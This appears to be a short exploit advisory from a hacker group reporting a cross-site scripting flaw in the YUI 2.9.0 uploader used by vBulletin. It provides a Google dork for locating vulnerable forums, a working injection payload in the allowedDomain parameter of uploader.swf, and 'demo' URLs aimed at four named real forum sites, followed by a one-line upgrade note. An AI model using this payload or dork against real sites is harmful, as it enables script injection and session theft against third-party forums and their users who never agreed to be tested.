vBulletin YUI 2.9.0 Cross Site Scripting

`[+] Author: TUNISIAN CYBER  
[+] Exploit Title: vBulletin YUI 2.9.0 Cross Site Scripting vulnerability  
[+] Date: 09-01-2014  
[+] Category: WebApp  
[+] Google Dork: :inurl:"clientscript/yui/uploader/assets/"  
[+] Tested on: KaliLinux  
[+} Friend's blog: www.na3il.com  
  
########################################################################################  
+Description:  
YUI is a free, open source JavaScript and CSS library for building richly interactive web applications.  
Used by vBulletin.  
+Exploit:  
YUI suffers from an xss vulnerability.  
+P.O.C:  
127.0.0.1/[PATH]/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf  
  
Demo:  
http://fansfoot.com/forum/core/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf  
http://www.liveworkshop.com/forums/core/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf  
http://www.mjjcommunity.com/forum/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf  
http://www.wivesbehindthebadge.org/forums/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf  
  
Patch:  
Upgarde to 3.X Version.  
./3nD  
########################################################################################  
Greets to: XMaX-tn, N43il HacK3r, XtechSEt  
Sec4Ever Members:  
DamaneDz  
UzunDz  
GEOIX  
########################################################################################  
`